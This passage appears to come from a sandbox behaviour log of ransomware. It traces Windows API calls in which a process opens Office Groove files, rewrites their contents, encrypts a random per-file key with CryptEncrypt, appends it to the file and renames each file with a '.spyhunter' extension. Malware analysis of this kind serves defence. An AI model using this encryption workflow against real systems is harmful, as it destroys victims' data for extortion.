dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html") returned 104 [0107.799] StrStrW (lpFirst="FormsHomePage.html", lpSrch=".txt") returned 0x0 [0107.799] GetProcessHeap () returned 0x2c0000 [0107.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.799] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa8c*=0xc96, lpOverlapped=0x0) returned 1 [0107.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff36a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.820] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc96, lpNumberOfBytesWritten=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa8c*=0xc96, lpOverlapped=0x0) returned 1 [0107.820] GetProcessHeap () returned 0x2c0000 [0107.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.820] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.820] WriteFile (in: hFile=0x178, lpBuffer=0x57facc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x57facc*, lpNumberOfBytesWritten=0x57fa8c*=0x4, lpOverlapped=0x0) returned 1 [0107.820] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa8c*=0x30, lpOverlapped=0x0) returned 1 [0107.821] CloseHandle (hObject=0x178) returned 1 [0107.821] GetProcessHeap () returned 0x2c0000 [0107.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.821] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html.spyhunter") returned 114 [0107.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepage.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formshomepage.html.spyhunter")) returned 1 [0107.822] GetProcessHeap () returned 0x2c0000 [0107.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.822] GetProcessHeap () returned 0x2c0000 [0107.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0107.822] GetProcessHeap () returned 0x2c0000 [0107.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf35f8 | out: hHeap=0x2c0000) returned 1 [0107.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fad0 | out: pbBuffer=0x57fad0) returned 1 [0107.822] GetProcessHeap () returned 0x2c0000 [0107.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0107.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fac8*=0x30) returned 1 [0107.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsbrowserupgrade.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0107.848] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html") returned 110 [0107.848] StrStrW (lpFirst="FormsBrowserUpgrade.html", lpSrch=".txt") returned 0x0 [0107.848] GetProcessHeap () returned 0x2c0000 [0107.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0107.848] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa8c*=0x7a7, lpOverlapped=0x0) returned 1 [0107.857] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff859, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.858] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x7a7, lpNumberOfBytesWritten=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa8c*=0x7a7, lpOverlapped=0x0) returned 1 [0107.858] GetProcessHeap () returned 0x2c0000 [0107.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0107.858] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.858] WriteFile (in: hFile=0x17c, lpBuffer=0x57facc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x57facc*, lpNumberOfBytesWritten=0x57fa8c*=0x4, lpOverlapped=0x0) returned 1 [0107.858] WriteFile (in: hFile=0x17c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa8c*=0x30, lpOverlapped=0x0) returned 1 [0107.858] CloseHandle (hObject=0x17c) returned 1 [0107.858] GetProcessHeap () returned 0x2c0000 [0107.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.859] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html.spyhunter") returned 120 [0107.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsbrowserupgrade.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsBrowserUpgrade.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsbrowserupgrade.html.spyhunter")) returned 1 [0107.860] GetProcessHeap () returned 0x2c0000 [0107.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.860] GetProcessHeap () returned 0x2c0000 [0107.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0107.860] GetProcessHeap () returned 0x2c0000 [0107.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf33a8 | out: hHeap=0x2c0000) returned 1 [0107.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fac8 | out: pbBuffer=0x57fac8) returned 1 [0107.861] GetProcessHeap () returned 0x2c0000 [0107.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0107.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fac0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fac0*=0x30) returned 1 [0107.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewselectionchanged.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0107.862] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js") returned 109 [0107.862] StrStrW (lpFirst="viewSelectionChanged.js", lpSrch=".txt") returned 0x0 [0107.862] GetProcessHeap () returned 0x2c0000 [0107.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0107.862] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa84*=0xce, lpOverlapped=0x0) returned 1 [0107.863] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.863] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x57fa84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa84*=0xce, lpOverlapped=0x0) returned 1 [0107.863] GetProcessHeap () returned 0x2c0000 [0107.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0107.863] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.863] WriteFile (in: hFile=0x17c, lpBuffer=0x57fac4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa84, lpOverlapped=0x0 | out: lpBuffer=0x57fac4*, lpNumberOfBytesWritten=0x57fa84*=0x4, lpOverlapped=0x0) returned 1 [0107.863] WriteFile (in: hFile=0x17c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa84*=0x30, lpOverlapped=0x0) returned 1 [0107.863] CloseHandle (hObject=0x17c) returned 1 [0107.864] GetProcessHeap () returned 0x2c0000 [0107.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.864] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js.spyhunter") returned 119 [0107.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewselectionchanged.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewselectionchanged.js.spyhunter")) returned 1 [0107.864] GetProcessHeap () returned 0x2c0000 [0107.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.864] GetProcessHeap () returned 0x2c0000 [0107.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0107.864] GetProcessHeap () returned 0x2c0000 [0107.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf3848 | out: hHeap=0x2c0000) returned 1 [0107.865] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fac0 | out: pbBuffer=0x57fac0) returned 1 [0107.865] GetProcessHeap () returned 0x2c0000 [0107.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0107.865] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fab8*=0x30) returned 1 [0107.865] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewheaderpreview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0107.872] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg") returned 107 [0107.911] StrStrW (lpFirst="ViewHeaderPreview.jpg", lpSrch=".txt") returned 0x0 [0107.912] GetProcessHeap () returned 0x2c0000 [0107.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0107.912] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa7c*=0xd78, lpOverlapped=0x0) returned 1 [0108.204] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff288, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.204] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd78, lpNumberOfBytesWritten=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa7c*=0xd78, lpOverlapped=0x0) returned 1 [0108.204] GetProcessHeap () returned 0x2c0000 [0108.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0108.205] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.205] WriteFile (in: hFile=0x17c, lpBuffer=0x57fabc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x57fabc*, lpNumberOfBytesWritten=0x57fa7c*=0x4, lpOverlapped=0x0) returned 1 [0108.205] WriteFile (in: hFile=0x17c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa7c*=0x30, lpOverlapped=0x0) returned 1 [0108.205] CloseHandle (hObject=0x17c) returned 1 [0108.268] GetProcessHeap () returned 0x2c0000 [0108.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.268] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg.spyhunter") returned 117 [0108.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewheaderpreview.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewheaderpreview.jpg.spyhunter")) returned 1 [0108.269] GetProcessHeap () returned 0x2c0000 [0108.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.269] GetProcessHeap () returned 0x2c0000 [0108.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0108.269] GetProcessHeap () returned 0x2c0000 [0108.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf3a98 | out: hHeap=0x2c0000) returned 1 [0108.269] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fac0 | out: pbBuffer=0x57fac0) returned 1 [0108.269] GetProcessHeap () returned 0x2c0000 [0108.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0108.269] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fab8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fab8*=0x30) returned 1 [0108.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\viewheaderpreview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0108.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg") returned 108 [0108.271] StrStrW (lpFirst="ViewHeaderPreview.jpg", lpSrch=".txt") returned 0x0 [0108.271] GetProcessHeap () returned 0x2c0000 [0108.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0108.272] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa7c*=0xd78, lpOverlapped=0x0) returned 1 [0108.273] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff288, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.274] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd78, lpNumberOfBytesWritten=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa7c*=0xd78, lpOverlapped=0x0) returned 1 [0108.274] GetProcessHeap () returned 0x2c0000 [0108.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0108.274] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.274] WriteFile (in: hFile=0x17c, lpBuffer=0x57fabc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x57fabc*, lpNumberOfBytesWritten=0x57fa7c*=0x4, lpOverlapped=0x0) returned 1 [0108.274] WriteFile (in: hFile=0x17c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa7c*=0x30, lpOverlapped=0x0) returned 1 [0108.274] CloseHandle (hObject=0x17c) returned 1 [0108.274] GetProcessHeap () returned 0x2c0000 [0108.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.274] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg.spyhunter") returned 118 [0108.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\viewheaderpreview.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\viewheaderpreview.jpg.spyhunter")) returned 1 [0108.275] GetProcessHeap () returned 0x2c0000 [0108.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.275] GetProcessHeap () returned 0x2c0000 [0108.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0108.275] GetProcessHeap () returned 0x2c0000 [0108.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x319ea8 | out: hHeap=0x2c0000) returned 1 [0108.275] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fab8 | out: pbBuffer=0x57fab8) returned 1 [0108.275] GetProcessHeap () returned 0x2c0000 [0108.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0108.275] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fab0*=0x30) returned 1 [0108.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0108.276] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.JS") returned 94 [0108.276] StrStrW (lpFirst="VIEW.JS", lpSrch=".txt") returned 0x0 [0108.276] GetProcessHeap () returned 0x2c0000 [0108.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0108.276] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa74*=0x1db1, lpOverlapped=0x0) returned 1 [0108.301] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffe24f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.301] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1db1, lpNumberOfBytesWritten=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa74*=0x1db1, lpOverlapped=0x0) returned 1 [0108.301] GetProcessHeap () returned 0x2c0000 [0108.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0108.301] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.301] WriteFile (in: hFile=0x17c, lpBuffer=0x57fab4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x57fab4*, lpNumberOfBytesWritten=0x57fa74*=0x4, lpOverlapped=0x0) returned 1 [0108.301] WriteFile (in: hFile=0x17c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa74*=0x30, lpOverlapped=0x0) returned 1 [0108.301] CloseHandle (hObject=0x17c) returned 1 [0108.334] GetProcessHeap () returned 0x2c0000 [0108.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.334] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.JS.spyhunter") returned 104 [0108.334] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.JS.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.js.spyhunter")) returned 1 [0108.335] GetProcessHeap () returned 0x2c0000 [0108.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.335] GetProcessHeap () returned 0x2c0000 [0108.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0108.335] GetProcessHeap () returned 0x2c0000 [0108.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9610 | out: hHeap=0x2c0000) returned 1 [0108.335] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fab8 | out: pbBuffer=0x57fab8) returned 1 [0108.335] GetProcessHeap () returned 0x2c0000 [0108.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0108.336] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fab0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fab0*=0x30) returned 1 [0108.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SAVE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\save.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0108.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SAVE.GIF") returned 95 [0108.429] StrStrW (lpFirst="SAVE.GIF", 